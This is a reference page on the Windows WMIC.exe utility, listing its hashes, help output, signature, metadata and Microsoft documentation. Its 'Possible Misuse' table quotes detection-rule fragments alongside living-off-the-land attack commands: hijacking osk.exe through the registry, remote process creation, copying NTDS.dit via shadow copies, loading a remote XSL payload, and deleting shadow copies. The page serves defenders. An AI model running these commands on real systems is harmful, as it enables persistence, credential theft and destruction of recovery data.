WMIC.exe
- File Path:
C:\WINDOWS\system32\wbem\WMIC.exe - Description: WMI Commandline Utility
Hashes
| Type | Hash |
|---|---|
| MD5 | B524D1706D895A504B192F864D50AEC3 |
| SHA1 | 264640D9AD805A0DB59DF31F5CCCB64C7EEA4071 |
| SHA256 | 9CA09A4366F3EF2006BE964CB0DE037219A311A2D49AAFAFA2C5BDC736DCE1BE |
| SHA384 | F9E25DDC26896A2CB7D225158425E770EB7E6477DFB4D757ACD8D1DAF33D01E68A0492DD5C30D3A074A2C2651E134A19 |
| SHA512 | BFC5FF3051B2DCD9DC94AAB691E8078D76BCADC4238E503CC66F2158164DEA7AAE0BF505C14F7A048C8CB21FF1B257CD2354587EDB58A6A1E695A03DF0315DA0 |
| SSDEEP | 6144:lvx6yRHcf1/L8UxUkorp/jvKwfqGS8AUrXwHrsVP2d5ITGH5enh:Bx6yaJ84WxJJAeAHrsVuYTGH0nh |
| IMP | 5268CCA80CACD62FE845F6ADABDFC03A |
| PESHA1 | 5D4B3382BBF803840F3D8F5961177D730408CF60 |
| PE256 | 85B27582E008F4780D821687ED16F86CFA2E3DD38A29A0BB2B2FA7D1C0B0113A |
Runtime Data
Usage (stdout):
WMIC is deprecated.
[global switches] <command>
The following global switches are available:
/NAMESPACE Path for the namespace the alias operate against.
/ROLE Path for the role containing the alias definitions.
/NODE Servers the alias will operate against.
/IMPLEVEL Client impersonation level.
/AUTHLEVEL Client authentication level.
/LOCALE Language id the client should use.
/PRIVILEGES Enable or disable all privileges.
/TRACE Outputs debugging information to stderr.
/RECORD Logs all input commands and output.
/INTERACTIVE Sets or resets the interactive mode.
/FAILFAST Sets or resets the FailFast mode.
/USER User to be used during the session.
/PASSWORD Password to be used for session login.
/OUTPUT Specifies the mode for output redirection.
/APPEND Specifies the mode for output redirection.
/AGGREGATE Sets or resets aggregate mode.
/AUTHORITY Specifies the <authority type> for the connection.
/?[:<BRIEF|FULL>] Usage information.
For more information on a specific global switch, type: switch-name /?
The following alias/es are available in the current role:
ALIAS - Access to the aliases available on the local system
BASEBOARD - Base board (also known as a motherboard or system board) management.
BIOS - Basic input/output services (BIOS) management.
BOOTCONFIG - Boot configuration management.
CDROM - CD-ROM management.
COMPUTERSYSTEM - Computer system management.
CPU - CPU management.
CSPRODUCT - Computer system product information from SMBIOS.
DATAFILE - DataFile Management.
DCOMAPP - DCOM Application management.
DESKTOP - User's Desktop management.
DESKTOPMONITOR - Desktop Monitor management.
DEVICEMEMORYADDRESS - Device memory addresses management.
DISKDRIVE - Physical disk drive management.
DISKQUOTA - Disk space usage for NTFS volumes.
DMACHANNEL - Direct memory access (DMA) channel management.
ENVIRONMENT - System environment settings management.
FSDIR - Filesystem directory entry management.
GROUP - Group account management.
IDECONTROLLER - IDE Controller management.
IRQ - Interrupt request line (IRQ) management.
JOB - Provides access to the jobs scheduled using the schedule service.
LOADORDER - Management of system services that define execution dependencies.
LOGICALDISK - Local storage device management.
LOGON - LOGON Sessions.
MEMCACHE - Cache memory management.
MEMORYCHIP - Memory chip information.
MEMPHYSICAL - Computer system's physical memory management.
NETCLIENT - Network Client management.
NETLOGIN - Network login information (of a particular user) management.
NETPROTOCOL - Protocols (and their network characteristics) management.
NETUSE - Active network connection management.
NIC - Network Interface Controller (NIC) management.
NICCONFIG - Network adapter management.
NTDOMAIN - NT Domain management.
NTEVENT - Entries in the NT Event Log.
NTEVENTLOG - NT eventlog file management.
ONBOARDDEVICE - Management of common adapter devices built into the motherboard (system board).
OS - Installed Operating System/s management.
PAGEFILE - Virtual memory file swapping management.
PAGEFILESET - Page file settings management.
PARTITION - Management of partitioned areas of a physical disk.
PORT - I/O port management.
PORTCONNECTOR - Physical connection ports management.
PRINTER - Printer device management.
PRINTERCONFIG - Printer device configuration management.
PRINTJOB - Print job management.
PROCESS - Process management.
PRODUCT - Installation package task management.
QFE - Quick Fix Engineering.
QUOTASETTING - Setting information for disk quotas on a volume.
RDACCOUNT - Remote Desktop connection permission management.
RDNIC - Remote Desktop connection management on a specific network adapter.
RDPERMISSIONS - Permissions to a specific Remote Desktop connection.
RDTOGGLE - Turning Remote Desktop listener on or off remotely.
RECOVEROS - Information that will be gathered from memory when the operating system fails.
REGISTRY - Computer system registry management.
SCSICONTROLLER - SCSI Controller management.
SERVER - Server information management.
SERVICE - Service application management.
SHADOWCOPY - Shadow copy management.
SHADOWSTORAGE - Shadow copy storage area management.
SHARE - Shared resource management.
SOFTWAREELEMENT - Management of the elements of a software product installed on a system.
SOFTWAREFEATURE - Management of software product subsets of SoftwareElement.
SOUNDDEV - Sound Device management.
STARTUP - Management of commands that run automatically when users log onto the computer system.
SYSACCOUNT - System account management.
SYSDRIVER - Management of the system driver for a base service.
SYSTEMENCLOSURE - Physical system enclosure management.
SYSTEMSLOT - Management of physical connection points including ports, slots and peripherals, and proprietary connections points.
TAPEDRIVE - Tape drive management.
TEMPERATURE - Data management of a temperature sensor (electronic thermometer).
TIMEZONE - Time zone data management.
UPS - Uninterruptible power supply (UPS) management.
USERACCOUNT - User account management.
VOLTAGE - Voltage sensor (electronic voltmeter) data management.
VOLUME - Local storage volume management.
VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume.
VOLUMEUSERQUOTA - Per user storage volume quota management.
WMISET - WMI service operational parameters management.
For more information on a specific alias, type: alias /?
CLASS - Escapes to full WMI schema.
PATH - Escapes to full WMI object paths.
CONTEXT - Displays the state of all the global switches.
QUIT/EXIT - Exits the program.
For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?
Usage (stderr):
help - Alias not found.
Loaded Modules:
| Path |
|---|
| C:\WINDOWS\System32\KERNEL32.DLL |
| C:\WINDOWS\System32\KERNELBASE.dll |
| C:\WINDOWS\SYSTEM32\ntdll.dll |
| C:\WINDOWS\system32\wbem\WMIC.exe |
Signature
- Status: Signature verified.
- Serial:
33000002ED2C45E4C145CF48440000000002ED - Thumbprint:
312860D2047EB81F8F58C29FF19ECDB4C634CF6A - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: wmic.exe.mui
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.22000.1 (WinBuild.160101.0800)
- Product Version: 10.0.22000.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/72
- VirusTotal Link: https://www.virustotal.com/gui/file/9ca09a4366f3ef2006be964cb0de037219a311a2d49aafafa2c5bdc736dce1be/detection
Possible Misuse
The following table contains possible examples of WMIC.exe being misused. While WMIC.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | win_susp_logon_explicit_credentials.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | sysmon_suspicious_remote_thread.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | file_event_win_win_shell_write_susp_directory.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | image_load_wmic_remote_xsl_scripting_dlls.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | image_load_wmi_module_load.yml | - 'C:\Windows\System32\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_bypass_squiblytwo.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_crime_maze_ransomware.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_html_help_spawn.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_local_system_owner_account_discovery.yml | - Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_mal_blue_mockingbird.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | - Image: '\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | - OriginalFileName: 'wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - Image\|endswith: '\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - OriginalFileName: 'wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - Image\|endswith: '\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_shell.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | proc_creation_win_office_spawning_wmi_commandline.yml | - Image\|endswith: '\wbem\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - 'wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shadow_copies_creation.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shadow_copies_deletion.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_suspicious_ad_reco.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_eventlog_clear.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_recon.yml | - '\WMIC.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_spoolsv_child_processes.yml | - \wmic.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_wmi_execution.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_webshell_detection.yml | Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_wmic_reconnaissance.yml | Image\|endswith: \WMIC.exe |
DRL 1.0 |
| sigma | proc_creation_win_wmic_remote_service.yml | Image\|endswith: \WMIC.exe |
DRL 1.0 |
| sigma | proc_creation_win_wmic_remove_application.yml | Image\|endswith: \WMIC.exe |
DRL 1.0 |
| sigma | proc_creation_win_xsl_script_processing.yml | - Image\|endswith: '\wmic.exe' |
DRL 1.0 |
| sigma | proc_creation_win_xsl_script_processing.yml | - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. |
DRL 1.0 |
| LOLBAS | Wmic.yml | Name: Wmic.exe |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process call create calc |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" |
|
| LOLBAS | Wmic.yml | - Path: C:\Windows\System32\wbem\wmic.exe |
|
| LOLBAS | Wmic.yml | - Path: C:\Windows\SysWOW64\wbem\wmic.exe |
|
| LOLBAS | Wmic.yml | - IOC: DotNet CLR libraries loaded into wmic.exe |
|
| LOLBAS | Wmic.yml | - IOC: DotNet CLR Usage Log - wmic.exe.log |
|
| atomic-red-team | T1047.md | This test uses wmic.exe to execute a process on the local host. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1069.001.md | Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1069.001.md | wmic.exe group get name | MIT License. © 2018 Red Canary |
| atomic-red-team | T1220.md | | wmic_command | WMI command to execute using wmic.exe | String | process list| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1490.md | wmic.exe shadowcopy delete | MIT License. © 2018 Red Canary |
| atomic-red-team | T1518.001.md | wmic.exe /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | MIT License. © 2018 Red Canary |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
wmic
Displays WMI information inside an interactive command shell.
Syntax
wmic </parameter>
Sub-commands
The following sub-commands are available at all times:
| Sub-command | Description |
|---|---|
| class | Escapes from the default alias mode of WMIC to access classes in the WMI schema directly. |
| path | Escapes from the default alias mode of WMIC to access instances in the WMI schema directly. |
| context | Displays the current values of all global switches. |
| [quit | exit] | Exits the WMIC command shell. |
Examples
To display the current values of all global switches, type:
wmic context
Output similar to the following displays:
NAMESPACE : root\cimv2
ROLE : root\cli
NODE(S) : BOBENTERPRISE
IMPLEVEL : IMPERSONATE
[AUTHORITY : N/A]
AUTHLEVEL : PKTPRIVACY
LOCALE : ms_409
PRIVILEGES : ENABLE
TRACE : OFF
RECORD : N/A
INTERACTIVE : OFF
FAILFAST : OFF
OUTPUT : STDOUT
APPEND : STDOUT
USER : N/A
AGGREGATE : ON
To change the language ID used by the command line to English (locale ID 409), type:
wmic /locale:ms_409
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.